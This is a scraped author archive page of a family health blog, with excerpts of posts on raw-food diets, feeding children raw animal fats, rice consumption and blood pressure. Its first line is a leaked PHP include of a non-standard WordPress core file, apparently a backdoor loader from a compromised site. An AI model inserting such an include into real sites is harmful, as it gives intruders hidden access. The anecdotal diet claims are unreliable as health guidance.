@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 214 of 235

Author: Good Samaritan

Cook’s Husband Suffered Low Blood due to high blood medicine

Our cook has not been coming to work for the past few days. Her husband collapsed in their toilet. They took him to the hospital and was told it was due to low blood? Low blood pressure? All those hospital tests and accommodations instantly cost them 15,000 pesos. All...

Looking at more raw animal fats and meats for our children

My wife and I have been evaluating our children and for the past number of years they have been growing on cooked rice, cooked and raw vegetables, raw fruit and some cooked fish does not seem to be working for them. Why do I say this? They’re smaller than...

Filipinos suffer from rice addiction

I remember when I was on a training seminar in the USA a long time ago.  We were some 8 filipinos sent to a small town in Minnesota, USA.  They fed us the normal USA food they had for 5 straight days.  At the end of the seminar we...

Why the american indian quit the raw for 30 days program

I have a theory regarding the reason the american indian diabetic in the www.rawfor30days.com program quit. He said so himself and we should accept his words at face value. He said “I’m just about ready to cross over”, meaning, I feel like dying on this diet. “I’m just not...

High quality organic raw food is expensive

We don’t eat out anymore.  But our food bill is astronomical.  All this raw food exploration is expensive.  I know it doesn’t have to be when we stabilize on it.  But right now exploring, going around, experimenting is expensive. Saturdays, buying organic vegetables and buying top quality fruits.  Every...